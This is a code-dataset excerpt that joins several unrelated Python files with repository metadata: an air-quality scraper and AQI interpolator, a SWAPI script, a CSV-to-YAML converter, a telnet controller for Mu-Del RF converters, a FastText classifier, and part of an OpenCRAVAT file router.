        'Fresh Kills West': DECStation(61, 'Fresh Kills West', -74.19832, 40.58027),
        'Port Richmond': DECStation(80, 'Port Richmond', -74.13719, 40.63307),
        'Susan Wagner': DECStation(49, 'Susan Wagner', -74.12525, 40.59664),
        #Bronx
        'IS 52': DECStation(24, 'IS 52', -73.9020, 40.8162),
        'IS 74': DECStation(8, 'IS 74', -73.88553, 40.81551),
        'NYBG': DECStation(57, 'NYBG', -73.87809, 40.86790),
        #Queens
        'Maspeth': DECStation(13, 'Maspeth', -73.89313, 40.72698),
        'Queens College': DECStation(62, 'Queens College', -73.82153, 40.73614),
        #Brooklyn
        'PS 274': DECStation(6, 'PS 274', -73.92769, 40.69454),
        'PS 314': DECStation(10, 'PS 314', -74.01871, 40.64182),
        #DEC group 3
        #North
        'White Plains': DECStation(34, 'White Plains', -73.76366, 41.05192),
        'Millbrook': DECStation(25, 'Millbrook', -73.74136, 41.78555)
    }
    return all_stations
def parse_to_float(x):
    """Coerce *x* to float, yielding NaN for unparseable values.

    Narrowed from a bare ``except`` to (TypeError, ValueError) so that
    unrelated errors (e.g. KeyboardInterrupt) are no longer swallowed.
    """
    try:
        return float(x)
    except (TypeError, ValueError):
        return np.nan
def get_station_raw_data(stations, start_date, end_date):
    """
    Download the station data from airnow website

    Scrapes each station's report page with Selenium/Chrome, parses the
    HTML table, cleans the pollutant columns, and concatenates all
    stations into a single DataFrame.

    NOTE(review): start_date/end_date are accepted but never used -- the
    page's default report range is whatever btnGenerateReport produces.
    """
    # Defaults
    website_cols = ['Date Time', 'O3', 'PM25C', 'SO2', 'CO']
    # NOTE(review): polished_names is unused in this function.
    polished_names = ['Date Time', 'station', 'lon', 'lat', 'PM25', 'O3', 'SO2', 'CO']
    # Load into one dataframe
    all_data = pd.DataFrame()
    # GOOGLE_CHROME_SHIM points at the Chrome binary on some PaaS
    # deployments (e.g. Heroku buildpacks); otherwise use local Chrome.
    chrome_bin = os.environ.get('GOOGLE_CHROME_SHIM')
    if chrome_bin:
        options = webdriver.ChromeOptions()
        options.binary_location = chrome_bin
        driver = webdriver.Chrome(chrome_options = options)
    else:
        driver = webdriver.Chrome()
    for name, station in stations.items():
        # Navigate to the webpage
        url = station.get_station_url()
        driver.get(url)
        driver.find_element_by_id('btnGenerateReport').click()
        # Scrape the content
        content = driver.page_source
        soup = bs4.BeautifulSoup(content)
        table = soup.find(attrs={'id': 'C1WebGrid1'})
        df = pd.read_html(str(table), header=0, flavor='bs4')[0]
        # Keep columns and parse
        cols_keep = list(set(df.columns).intersection(set(website_cols)))
        df = df[cols_keep]
        df['Date Time'] = df['Date Time'].map(pd.to_datetime)
        col_nulls = {}
        for col in df.columns:
            if col != 'Date Time':
                df[col] = df[col].map(parse_to_float)
                col_nulls[col] = pd.isnull(df[col])
        df_nulls = pd.DataFrame(col_nulls)
        # True only where every pollutant column is NaN for the row.
        all_nulls = df_nulls.apply(min, axis = 1)
        # Filter out bad dates and NaNs
        df_filtered = df[-(all_nulls | pd.isnull(df['Date Time']))]
        # Add missing columns
        cols_add = set(website_cols) - set(df_filtered.columns)
        for col in cols_add:
            df_filtered[col] = np.nan
        df_filtered['station'] = name
        df_filtered['lon'] = station.lon
        df_filtered['lat'] = station.lat
        df_filtered.rename(columns = {'PM25C': 'PM25'}, inplace = True)
        all_data = all_data.append(df_filtered, ignore_index=True)
    driver.quit()
    return all_data
def calculate_stations_aqi_data(station_data, breakpoints, aq_variables):
    """
    24 hours for PM2.5, 1 hours for O3

    Aggregates the latest readings per station, computes the AQI from the
    breakpoint table, and returns a long-format frame with columns
    ['station', 'lon', 'lat', 'variable', 'value'].
    """
    station_grouped = station_data.groupby(['station', 'lon', 'lat'])
    # NOTE(review): despite the '24hr' name this takes only the last
    # reading (tail(1)) -- confirm the intended averaging window.
    stations_PM25_24hr = station_grouped.agg({'PM25':
        lambda x: np.mean(x.tail(1))})
    stations_O3_1hr = station_grouped.agg({'O3':
        lambda x: np.mean(x.tail(1)) * 1000}) # x 1000 to get to ppb
    stations_O3_8hr = station_grouped.agg({'O3':
        lambda x: np.mean(x.tail(8)) * 1000}) # x 1000 to get to ppb
    stations_PM25_24hr.columns = ['PM25_24hr']
    stations_O3_1hr.columns = ['O3_1hr']
    stations_O3_8hr.columns = ['O3_8hr']
    stations_out = stations_PM25_24hr.join(stations_O3_1hr).join(stations_O3_8hr)
    # AQI per station = max sub-index over its pollutant readings.
    stations_out['AQI'] = stations_out.apply(lambda x: calculate_aqi(x, breakpoints), axis=1)
    stations_out.reset_index(level=[0,1,2], inplace=True)
    # Keep the 8-hour O3 value for reporting, then melt to long format.
    stations_out = stations_out[['station', 'lon', 'lat', 'PM25_24hr', 'O3_8hr', 'AQI']]
    stations_out.columns = ['station', 'lon', 'lat', 'PM25', 'O3', 'AQI']
    stations_out = pd.melt(stations_out, id_vars=['station', 'lon', 'lat'], value_vars=aq_variables)
    stations_out = stations_out.dropna()
    return stations_out
def calculate_aqi(station_obs, breakpoints):
    """Overall AQI for a station = max sub-index across its pollutants.

    Given a station's cross-sectional data (a pandas Series of pollutant
    values), score each value against the breakpoint table and return
    the maximum.

    Uses ``Series.items()``: ``iteritems`` was removed in pandas 2.0 and
    ``items`` is the drop-in replacement.
    """
    aqi = 0
    for name, value in station_obs.items():
        aqi = max(aqi, calculate_score(value, breakpoints, name))
    return aqi
def calculate_score(value, breakpoints, name):
    """Linearly interpolate the AQI sub-index for one pollutant value.

    ``DataFrame.ix`` was removed in pandas 1.0; ``.loc`` is the drop-in
    replacement here because ``breakpoints`` carries the default integer
    index produced by ``read_csv``.

    :param value: measured concentration (NaN or negative handled).
    :param breakpoints: table with an 'Index' column and one column per
        pollutant giving the concentration breakpoints.
    :param name: pollutant column name in *breakpoints*.
    :return: interpolated sub-index, or 0 for NaN/below-scale values.
    """
    if np.isnan(value):
        return 0
    if value < 0:
        value = 0
    # First breakpoint row strictly above the measured value.
    ndx = breakpoints[breakpoints[name] > value].index[0]
    if ndx == 0:
        return 0
    index_l = breakpoints.loc[ndx - 1, 'Index']
    index_h = breakpoints.loc[ndx, 'Index']
    conc_l = breakpoints.loc[ndx - 1, name]
    conc_h = breakpoints.loc[ndx, name]
    out = (float(index_h - index_l) / float(conc_h - conc_l)) * \
        float(value - conc_l) + index_l
    return 0 if np.isnan(out) else out
def get_interpolated_grid_data(station_data, aq_variables, data_dir = '/app/static/'):
    """
    Given a melted dataframe of cross-sectional station data
    (pertaining to one time stamp), output the corresponding grid data

    For each variable, values are interpolated over the grid defined in
    grid_locs.csv via Delaunay triangulation; grid points outside the
    triangulation fall back to the nearest station's value.

    NOTE(review): matplotlib.mlab.griddata was deprecated in matplotlib
    2.2 and removed in 3.1 -- this function needs porting to
    scipy.interpolate.griddata on modern matplotlib versions.
    """
    locs_file = os.path.join(data_dir, 'grid_locs.csv')
    locs = pd.read_csv(locs_file)
    lon_locs = np.unique(locs['c_lon'].values)
    lat_locs = np.unique(locs['c_lat'].values)
    locs_data = locs[['gr_id']]
    # For each air quality variable, interpolate across the grid given available stations
    for aq_v in aq_variables:
        station_data_aqv = station_data[station_data['variable'] == aq_v]
        #
        # Find nearest station
        #
        nearest_station = interpolate.griddata((station_data_aqv['lon'].values, station_data_aqv['lat'].values),
                                               station_data_aqv['station'].values,
                                               (locs['c_lon'].values, locs['c_lat'].values), method='nearest')
        nearest_station_df = pd.DataFrame({'gr_id': locs['gr_id'].values,
                                           'station': nearest_station,
                                           'c_lon': locs['c_lon'].values, 'c_lat': locs['c_lat'].values})
        nearest_station_df = pd.merge(nearest_station_df, station_data_aqv, on='station')
        #
        # Interpolate using Delaunay triangulation, filling the holes with nearest neighbor
        #
        # lon x lat - melted lons change first
        aq_v_interpolated = mlab.griddata(station_data_aqv['lat'].values, station_data_aqv['lon'].values,
                                          station_data_aqv['value'].values, lat_locs, lon_locs, interp='linear')
        # Out of area locations
        out_of_area_locs = pd.melt(pd.DataFrame(aq_v_interpolated.mask))
        out_of_area_locs = locs_data['gr_id'][out_of_area_locs['value']].values
        aq_v_data = aq_v_interpolated.data
        # For grid points that are out of range of triangulation, use closest station
        for ooa_loc in out_of_area_locs:
            near_station_dat = nearest_station_df[nearest_station_df['gr_id'] == ooa_loc]
            xx = lon_locs.searchsorted(near_station_dat['c_lon'])
            yy = lat_locs.searchsorted(near_station_dat['c_lat'])
            aq_v_data[xx, yy] = near_station_dat['value']
        new_col = pd.melt(pd.DataFrame(aq_v_data))
        locs_data[aq_v] = new_col['value']
    return locs_data
def predict_stations_data(stations_dat, forecast_periods):
    """
    Predict the stations data into the future.

    Returns a frame with one naive forecast row per station for each of
    `forecast_periods` hourly steps past the last observed 'Date Time'.
    """
    last_time = stations_dat['Date Time'].max()
    stations_grouped = stations_dat.groupby(['station', 'lat', 'lon'])
    # The per-station prediction does not depend on the horizon, so run
    # the (expensive) groupby apply once instead of once per period.
    base_preds = stations_grouped.apply(predict_station).reset_index(drop=True)
    all_forecasts = pd.DataFrame()
    for fp in range(1, forecast_periods + 1):
        # Copy so each period gets its own 'Date Time' stamp.
        station_preds = base_preds.copy()
        station_preds['Date Time'] = last_time + dt.timedelta(hours=fp)
        all_forecasts = all_forecasts.append(station_preds)
    return all_forecasts
def predict_station(var_series):
    """
    Predict the next value in the time series.

    Naive persistence forecast: return the most recent entry, using a
    positional slice so the result keeps its container type.
    """
    return var_series.iloc[-1:]
def get_breakpoints(data_dir = '/app/static'):
    """Load the AQI breakpoint table from `data_dir`/breakpoints.csv."""
    return pd.read_csv(os.path.join(data_dir, 'breakpoints.csv'))
@timeout(90)
def main():
    """
    Main function: times out after 90 seconds.

    Pipeline: fetch raw station data for the last day, forward-fill gaps,
    forecast each station ahead, then for each of the most recent time
    stamps compute AQI values and interpolate them over the grid.
    Returns the concatenated grid dataframe for all time stamps.
    """
    print('Begin main')
    aq_variables = ['PM25', 'O3', 'AQI']
    hist_periods = 5
    forecast_periods = 7
    all_stations = get_stations()
    breakpoints = get_breakpoints()
    #Dates for current period
    end_date = dt.date.today()
    start_date = end_date - dt.timedelta(1)
    print('Get station data')
    station_data_raw = get_station_raw_data(all_stations, start_date, end_date)
    print('Finished getting station data')
    # Forward-fill gaps within each station's own series; the groupby
    # drops the grouping column, so restore 'station' afterwards.
    stations_ffilled = station_data_raw.groupby('station').fillna(method='ffill')
    stations_ffilled['station'] = station_data_raw['station']
    stations_predictions = predict_stations_data(stations_ffilled, forecast_periods)
    all_station_data = stations_ffilled.append(stations_predictions)
    # Keep only the trailing window: recent history plus the forecasts.
    time_stamps = all_station_data['Date Time'].unique()[
        -(hist_periods+forecast_periods):]
    all_grid_data = pd.DataFrame()
    print('Calculating AQI and Interpolating over grid')
    for ts in time_stamps:
        # NOTE(review): '<= ts' passes all history up to ts rather than just
        # the cross-section at ts — presumably the AQI calculation needs
        # trailing data; confirm against calculate_stations_aqi_data.
        station_time = all_station_data[all_station_data['Date Time'] <= ts]
        # Current station data
        stations_output = calculate_stations_aqi_data(station_time, breakpoints, aq_variables)
        # Interpolate the grid data
        current_grid_data = get_interpolated_grid_data(stations_output, aq_variables)
        current_grid_data['time'] = ts
        all_grid_data = all_grid_data.append(current_grid_data)
    print('Finished main')
    return all_grid_data
| patrick-miller/forecastaer | main.py | main.py | py | 11,649 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "numpy.nan",
"line_number": 76,
"usage_type": "attribute"
},
{
"api_name": "pandas.DataFrame",
"line_number": 88,
"usage_type": "call"
},
{
"api_name": "os.environ.get",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line... |
30874114710 | import requests
# Fetch one SWAPI starship record and list the films it appears in.
ship = "10/"
starship_response = requests.get("https://swapi.co/api/starships/" + ship)
print(starship_response.status_code)
starship = starship_response.json()
print(str(starship['name']))
print("Peliculas:")
for film_url in starship['films']:
    # Each entry is the URL of a film resource; fetch and print its title.
    film = requests.get(str(film_url)).json()
    print(str(film['title']))
{
"api_name": "requests.get",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 12,
"usage_type": "call"
}
] |
32200653326 | #! /usr/bin/env python
import sys
import argparse
import csv
def main():
    """
    Convert a CSV file to a simple YAML mapping.

    Each data row becomes a top-level numeric key whose value is a mapping
    of column name to cell value.  Empty cells are kept (emitted as blank
    values) but a warning is printed for each one.
    """
    parser = argparse.ArgumentParser()
    # Bug fix: open in text mode.  Under Python 3 csv.reader requires str
    # input and the output is written with str, so the original 'rb'/'wb'
    # modes raised TypeError.
    parser.add_argument('input', metavar='INPUT', type=argparse.FileType('r'), help="csv file")
    parser.add_argument('output', metavar='OUTPUT', type=argparse.FileType('w'), help="yml file")
    args = parser.parse_args()
    csvreader = csv.reader(args.input)
    column_names = next(csvreader)
    i = 0
    f = args.output
    for row in csvreader:
        f.write(str(i) + ":\n")
        i += 1
        j = 0
        for attr in row:
            if len(attr) == 0:
                print("WARNING! Entry #" + str(i) + "'s \"" + column_names[j] + "\" is null")
            f.write(" " + column_names[j] + ": " + attr + "\n")
            j += 1
    # Close explicitly so the output is flushed even when main() is called
    # as a library function (argparse's FileType does not close the files).
    f.close()
    args.input.close()

if __name__ == '__main__':
    sys.exit(main())
| pk-hack/CoilSnake | coilsnake/tools/csv2yml.py | csv2yml.py | py | 818 | python | en | code | 153 | github-code | 1 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "argparse.FileType",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "argparse.FileType",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "csv.reader... |
30807069231 | #!/usr/bin/env python
#
# A class to control mu-del converters
#
# Incomplete
# 7DEC11 - Kyle Eberhart
import telnetlib
import logging
from multiprocessing import Process
from multiprocessing import Queue as Q
import queue
import time
class ConvProcess(object):
    '''
    A converter controller that runs in a separate process, for smoother
    GUI operation. in_queue is how you send commands, out_queue is where
    data comes back.
    '''
    def __init__(self, **kwargs):
        '''
        Initialize our queues and other startup tasks.

        Keyword args:
            address: IP/hostname of the converter (passed to Converter).
            port: TCP port of the converter.
        '''
        self.in_queue = Q()
        self.out_queue = Q()
        self.process = None
        self.address = kwargs.get('address', None)
        self.port = kwargs.get('port', None)
        self.converter_target = None

    def connect(self):
        '''
        start the converter communication process, feed it some queues.
        '''
        self.process = Process(target=self._connect,
                               args=(self.in_queue, self.out_queue))
        self.process.daemon = 1
        self.process.start()

    def command(self, message):
        '''
        send a command to the converter, using the in_q.
        '''
        self.in_queue.put(message)

    def disconnect(self):
        '''
        disconnect from the converter and terminate the process.
        '''
        self.in_queue.put('disconnect')

    def kill_process(self):
        '''
        kill the child process.
        '''
        self.in_queue.put('kill')
        self.process.join()
        self.process = None
        self.converter_target = None

    def _connect(self, in_q, out_q):
        '''
        The converter connection and processing loop (runs in the child
        process).  Commands arrive on in_q; status dicts and log strings
        are pushed onto out_q roughly once per second.
        '''
        self.converter_target = Converter(address=self.address,
                                          port=self.port)
        self.converter_target.connect()
        while True:
            try:
                conv_command = in_q.get_nowait()
                if conv_command == 'disconnect':
                    # Bug fix: Converter's close method is named disConnect
                    # (sic); there is no disconnect() on Converter.
                    self.converter_target.disConnect()
                    out_q.put("Requesting converter process termination.")
                elif conv_command == 'kill':
                    break
                elif 'freq' in conv_command:
                    self.converter_target.setFreq(conv_command[1])
                elif 'atten' in conv_command:
                    self.converter_target.setAtten(conv_command[1])
                elif 'mute' in conv_command:
                    if conv_command[1]:
                        self.converter_target.setMute()
                    else:
                        self.converter_target.unsetMute()
            except queue.Empty:
                # Bug fix: multiprocessing queues raise queue.Empty; the
                # original 'Queue.Empty' was an undefined name (the import
                # is 'Queue as Q') and crashed on every empty poll.
                # No pending command, so poll the converter for status.
                try:
                    if self.converter_target is not None:
                        self.converter_target.getStatus()
                        out_q.put({'freq' : self.converter_target.frequency,
                                   'atten' : self.converter_target.attenuation,
                                   'status' : self.converter_target.statusCode,
                                   'mute' : self.converter_target.mute})
                except EOFError:
                    out_q.put("Status attempt failed!")
                    self.converter_target.disConnect()
                    out_q.put("Requesting converter process termination.")
                time.sleep(1)

    def __del__(self):
        '''
        clean up correctly if possible.
        '''
        if self.process:
            self.disconnect()
            self.kill_process()
class Converter(object):
    """
    Telnet controller for a single Mu-Del up/down converter.

    Supported models (detected at connect time from the '<?' query):
    MDC-1627F1K-7, MDC-2125F1K-72 and MUC-7-1627-F1K.
    """

    # Status-register value -> human readable text (shared by all models;
    # replaces the duplicated if/elif ladders that used 'is' on ints,
    # which relies on CPython small-int caching and is not reliable).
    _STATUS_CODES = {
        1: "Normal Operation",
        2: "Synth Lock Lost",
        3: "Synth 2 Lock Lost",
        4: "Synth 3 Lock Lost",
        5: "Local Osc Lock Lost",
        6: "Aux Input 2 Alarm",
        7: "Aux Input 3 Alarm",
        8: "Aux Input 4 Alarm",
        9: "Reference Osc Lost",
    }

    def __init__(self, address='192.168.1.3', port=4004):
        self.logger = logging.getLogger(__name__)
        self.address = address
        self.port = port
        self.target = None      # telnetlib.Telnet instance once connected
        self.errorMsg = None

    def __repr__(self):
        return "<MuDelConverter('%s', '%s')" % (self.address, self.port)

    def connect(self):
        '''
        connect to the converter, and determine the converter type
        '''
        self.target = telnetlib.Telnet(self.address, self.port)
        self.target.write('<?\r'.encode('ascii'))
        self.status = self.target.read_until(b'randomString', 2).decode('ascii')
        if 'MDC-1627F1K-7' in self.status:
            self.type = 'MDC-1627F1K-7'
        elif 'MDC-2125F1K-72' in self.status:
            self.type = 'MDC-2125F1K-72'
        elif 'MUC-7-1627-F1K' in self.status:
            self.type = 'MUC-7-1627-F1K'
        else:
            self.errorMsg = "Converter model unknown: %s" % self.status
            self.logger.debug(self.errorMsg)
            raise RuntimeError(self.errorMsg)

    def disConnect(self):
        '''
        disconnect from the converter
        '''
        self.target.close()
        self.target = None

    # Backward-compatible alias: callers (e.g. ConvProcess) expect a
    # conventionally named disconnect() as well.
    disconnect = disConnect

    def getStatus(self):
        '''
        Query the converter ('<S') and refresh frequency, attenuation,
        statusCode and mute from the reply.  Returns the parsed values.
        '''
        if self.target is None:
            self.connect()
        self.target.write('<S\r'.encode('ascii'))
        self.status = self.target.read_until(b'SomeCrazyString', 2).decode('ascii')
        myStatus = self.status[1:].split(',')
        if self.type == 'MDC-1627F1K-7' or self.type == 'MUC-7-1627-F1K':
            # These models report a kHz offset from 1600 MHz.
            self.frequency = (float(myStatus[0]) + 1600000) / 1000
            self.attenuation = (float(myStatus[1]) / 5)
            self.statusCode = self._STATUS_CODES.get(int(myStatus[2]), "Unknown")
            self.mute = bool(int(myStatus[3][0:1]))
        if self.type == 'MDC-2125F1K-72':
            # This model reports a kHz offset from 2100 MHz and has no mute.
            self.frequency = (float(myStatus[0]) + 2100000) / 1000
            self.attenuation = (float(myStatus[1]) / 5)
            self.statusCode = self._STATUS_CODES.get(int(myStatus[2]), "Unknown")
            self.mute = None
        return {'Freq': self.frequency, 'Atten': self.attenuation, 'Code': self.statusCode, 'Mute': self.mute}

    def setFreq(self, freq):
        '''
        set the converter frequency (freq in MHz)
        '''
        if self.target is None:
            self.connect()
        if self.type == 'MDC-1627F1K-7' or self.type == 'MUC-7-1627-F1K':
            # Command value is the kHz offset from 1600 MHz, clamped to range.
            stepValue = (int((float(freq) * 1000)) - 1600000)
            if stepValue < 0:
                stepValue = 0
            if stepValue > 1100000:
                stepValue = 1100000
            self.target.write('<X1{}\r'.format(stepValue).encode('ascii'))
            self.target.read_until(b'SomeCrazyString', 2).decode('ascii')
        elif self.type == 'MDC-2125F1K-72':
            # kHz offset from 2100 MHz, clamped to range.
            stepValue = (int((float(freq) * 1000)) - 2100000)
            if stepValue < 0:
                stepValue = 0
            if stepValue > 400000:
                stepValue = 400000
            self.target.write('<{}\r'.format(stepValue).encode('ascii'))
            self.target.read_until(b'SomeCrazyString', 2).decode('ascii')
        else:
            self.errorMsg = "Unknown converter type, no freq change"
            self.logger.debug(self.errorMsg)
            raise RuntimeError(self.errorMsg)

    def setAtten(self, atten):
        '''
        Set the attenuation (atten in dB, 0.2 dB steps, clamped to 0-30 dB).
        '''
        if self.target is None:
            self.connect()
        if self.type == 'MDC-1627F1K-7' or self.type == 'MUC-7-1627-F1K':
            stepValue = int(float(atten) * 5)
            if stepValue < 0:
                stepValue = 0
            if stepValue > 150:
                stepValue = 150
            self.target.write('<A1{}\r'.format(stepValue).encode('ascii'))
            self.target.read_until(b'SomeCrazyString', 2).decode('ascii')
        elif self.type == 'MDC-2125F1K-72':
            stepValue = int(float(atten) * 5)
            if stepValue < 0:
                stepValue = 0
            if stepValue > 150:
                stepValue = 150
            self.target.write('<A{}\r'.format(stepValue).encode('ascii'))
            self.target.read_until(b'SomeCrazyString', 2).decode('ascii')
        else:
            self.errorMsg = "Unknown converter type, no atten change"
            raise RuntimeError(self.errorMsg)

    def setMute(self):
        '''
        Mute the converter output (not supported on the MDC-2125F1K-72).
        '''
        if self.target is None:
            self.connect()
        if self.type == 'MDC-2125F1K-72':
            self.errorMsg = "This D/C doesn't support muting"
            raise RuntimeError(self.errorMsg)
        self.target.write('<M1\r'.encode('ascii'))
        self.target.read_until(b'SomeCrazyString', 2).decode('ascii')

    def unsetMute(self):
        '''
        Unmute the converter output (not supported on the MDC-2125F1K-72).
        '''
        if self.target is None:
            self.connect()
        if self.type == 'MDC-2125F1K-72':
            self.errorMsg = "This D/C doesn't support muting"
            raise RuntimeError(self.errorMsg)
        self.target.write('<M0\r'.encode('ascii'))
        self.target.read_until(b'SomeCrazyString', 2).decode('ascii')

    def setConfig(self, **kwargs):
        '''
        configure the whole converter in one bang
        (recognized keys: Freq, Atten, Mute)
        '''
        if 'Freq' in kwargs:
            self.setFreq(kwargs['Freq'])
        if 'Atten' in kwargs:
            self.setAtten(kwargs['Atten'])
        if 'Mute' in kwargs:
            if kwargs['Mute'] is True:
                self.setMute()
            if kwargs['Mute'] is False:
                self.unsetMute()

    def close(self):
        '''Close the telnet connection if one is open (safe to call twice).'''
        if self.target is not None:
            self.disConnect()
if __name__ == "__main__":
    # run a test, or just set things up...
    # CLI: connect to the converter at DEST (ip:port), print its status,
    # optionally apply a new frequency/attenuation, and always unmute.
    import argparse
    import sys
    logging.basicConfig(filename='Mudelconverter.log',
                        filemode='w',
                        level=logging.INFO)
    parser = argparse.ArgumentParser(description='Configure a MuDel Converter',
                                     formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument('-f', '--freq', help='Set the frequency in MHz.')
    parser.add_argument('-a', '--atten', help='Set the attenuation in dB.')
    parser.add_argument('-m', '--mute', help='Toggle the mute.')
    parser.add_argument('dest', help='IP address of the target device.')
    args = parser.parse_args()
    config = vars(args)
    if config['dest'] is not None:
        try:
            # NOTE(review): port stays a string here and is handed to
            # Converter as-is — confirm telnetlib accepts it.
            ip, port = config['dest'].split(':')
        except ValueError as err:
            print('\nIt doesn\'t seem like a port was specified.')
            print('\txxx.xxx.xxx.xxx:ppp')
            print('Where xxx is the IP octet and ppp is the port number.\n')
            sys.exit()
        try:
            converter = Converter(ip, port)
            converter.connect()
            print('\n')
            # print(converter.status)
        except RuntimeError as err:
            print('\nConnection to converter failed!!!')
            print(err)
            print('\n')
            sys.exit()
        try:
            converter.getStatus()
            print('---- Current Status ----')
            print('Freq: {} MHz'.format(converter.frequency))
            print('Atten: {} dB'.format(converter.attenuation))
            print('LO: {}'.format(converter.statusCode))
            print('Mute: {}'.format(converter.mute))
            print('\n')
        except RuntimeError as err:
            print('\nStatus fetch failed!!!')
            print(err)
            print('\n')
            sys.exit()
        if config['freq'] is not None:
            # set the frequency, check the input formatting first.
            converter.setFreq(config['freq'])
        if config['atten'] is not None:
            # set the attenuation, check the input formatting first.
            converter.setAtten(config['atten'])
        if config['mute'] is not None:
            # always unmute the converter.
            converter.unsetMute()
        converter.getStatus()
        print('---- Final Status ----')
        print('Freq: {} MHz'.format(converter.frequency))
        print('Atten: {} dB'.format(converter.attenuation))
        print('LO: {}'.format(converter.statusCode))
        print('Mute: {}'.format(converter.mute))
        print('\n')
        converter.close()
        sys.exit()
| keberhart/mu_del_converters | MuDelconverter.py | MuDelconverter.py | py | 13,500 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "multiprocessing.Queue",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "multiprocessing.Queue",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "multiprocessing.Process",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "t... |
20491607874 | import torch
from torch import nn
import torch.nn.functional as F
class FastText(nn.Module):
    """
    Bag-of-embeddings text classifier in the fastText style.

    Token (and optionally bigram) embeddings are masked, averaged over the
    sequence dimension, and passed through a single linear layer.
    """
    def __init__(self, num_tags, vocab_size, embed_size, input_dropout_rate,
                 embed_type='rand', use_bigram=False, bigram_vocab_size=0, bigram_embed_size=0):
        super(FastText, self).__init__()
        self.embed_type = embed_type
        self.use_bigram = use_bigram
        feature_size = embed_size
        self.embedding = nn.Embedding(vocab_size, embed_size)
        if use_bigram:
            # Two bigram channels are concatenated onto the unigram embedding.
            feature_size = feature_size + bigram_embed_size * 2
            self.bigram_embedding = nn.Embedding(bigram_vocab_size, bigram_embed_size)
        if embed_type == 'static':
            # 'static' embeddings are frozen (excluded from training).
            self.embedding.weight.requires_grad_(False)
            if use_bigram:
                self.bigram_embedding.weight.requires_grad_(False)
        self.linear = nn.Linear(feature_size, num_tags)
        self.in_dropout = nn.Dropout(input_dropout_rate)
        self.ce_loss = nn.CrossEntropyLoss()

    def init_embedding(self, pretrained_embeddings):
        """Load pretrained unigram vectors (numpy array) into the table."""
        with torch.no_grad():
            self.embedding.weight.copy_(torch.from_numpy(pretrained_embeddings))

    def init_bigram_embedding(self, pretrained_embeddings):
        """Load pretrained bigram vectors (numpy array) into the table."""
        with torch.no_grad():
            self.bigram_embedding.weight.copy_(torch.from_numpy(pretrained_embeddings))

    def forward(self, tokens, masks, bigram, decode=True, tags=None):
        """
        tokens/masks: (batch, seq) id and 0/1 tensors; bigram is indexed
        as (batch, seq, channel) and only used when use_bigram is set.
        Returns predicted tag ids (numpy) when decode, else the CE loss.
        """
        masks = masks.unsqueeze(2)
        features = self.embedding(tokens)
        if self.use_bigram:
            bigram_feats = [self.bigram_embedding(bigram[:, :, i]) for i in range(bigram.size()[2])]
            features = torch.cat([features] + bigram_feats, dim=2)
        features = self.in_dropout(features)
        # NOTE(review): the mean divides by the full sequence length, so
        # padded positions (zeroed by the mask) still dilute the average —
        # presumably intentional; confirm.
        pooled = torch.mul(features, masks).mean(1)
        logits = self.linear(pooled)
        if not decode:
            return self.ce_loss(logits, tags)
        probs = F.softmax(logits, dim=1)
        return torch.argmax(probs, dim=1).cpu().numpy()
| zerozzl/nlp_text_cla | fasttext/model.py | model.py | py | 2,103 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "torch.nn.Module",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "torch.nn.Embedding",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_n... |
16199796086 | import os
import time
import datetime
import subprocess
import yaml
import json
from cravat import admin_util as au
from cravat import ConfigLoader
import sys
import traceback
import shutil
from aiohttp import web
#from cryptography import fernet
#from aiohttp_session import get_session, new_session
import aiosqlite3
import hashlib
from distutils.version import LooseVersion
import glob
import platform
class FileRouter(object):
    """
    Maps job ids to filesystem paths (job directory, original input,
    result database, reports, log) under the per-user jobs directory.
    """

    def __init__(self):
        self.root = os.path.dirname(__file__)
        self.input_fname = 'input'
        # report type -> file extension; anything else falls back to
        # '.' + report type (see job_report).
        self.report_extensions = {
            'text':'.tsv',
            'excel':'.xlsx'
        }
        self.db_extension = '.sqlite'
        self.log_extension = '.log'

    async def get_jobs_dir (self, request):
        """
        Return the jobs directory for the requesting user.  Multi-user
        (servermode) session handling is currently disabled; everything
        runs as the 'default' user.
        """
        root_jobs_dir = au.get_jobs_dir()
        username = 'default'
        jobs_dir = os.path.join(root_jobs_dir, username)
        return jobs_dir

    async def job_dir(self, request, job_id):
        """Path of the job's directory, or None if no jobs dir resolves."""
        jobs_dir = await self.get_jobs_dir(request)
        if jobs_dir == None:
            return None
        else:
            return os.path.join(jobs_dir, job_id)

    async def job_input(self, request, job_id):
        """
        Path of the job's original input file (no extension appended),
        or None when it cannot be determined.
        """
        # Bug fix: use self rather than the module-level 'filerouter'
        # global, so any FileRouter instance works on its own.
        job_dir, statusjson = await self.job_status(request, job_id)
        orig_input_fname = None
        if 'orig_input_fname' in statusjson:
            orig_input_fname = statusjson['orig_input_fname']
        else:
            # Fall back to the .crv file the pipeline generated.
            fns = os.listdir(job_dir)
            for fn in fns:
                if fn.endswith('.crv'):
                    orig_input_fname = fn[:-4]
                    break
        if orig_input_fname is not None:
            orig_input_path = os.path.join(job_dir, orig_input_fname)
        else:
            orig_input_path = None
        return orig_input_path

    async def job_db(self, request, job_id):
        """Path of the job's sqlite result database."""
        orig_input_path = await self.job_input(request, job_id)
        output_fname = orig_input_path + self.db_extension
        return output_fname

    async def job_report(self, request, job_id, report_type):
        """Path of the job's report file for the given report type."""
        ext = self.report_extensions.get(report_type, '.'+report_type)
        orig_input_path = await self.job_input(request, job_id)
        report_path = orig_input_path + ext
        return report_path

    async def job_status (self, request, job_id):
        """Return (job_dir, parsed status dict) for the job."""
        job_dir = await self.job_dir(request, job_id)
        fns = os.listdir(job_dir)
        statusjson = {}
        for fn in fns:
            if fn.endswith('.status.json'):
                with open(os.path.join(job_dir, fn)) as f:
                    statusjson = json.loads(f.readline())
            elif fn.endswith('.info.yaml'):
                with open(os.path.join(job_dir, fn)) as f:
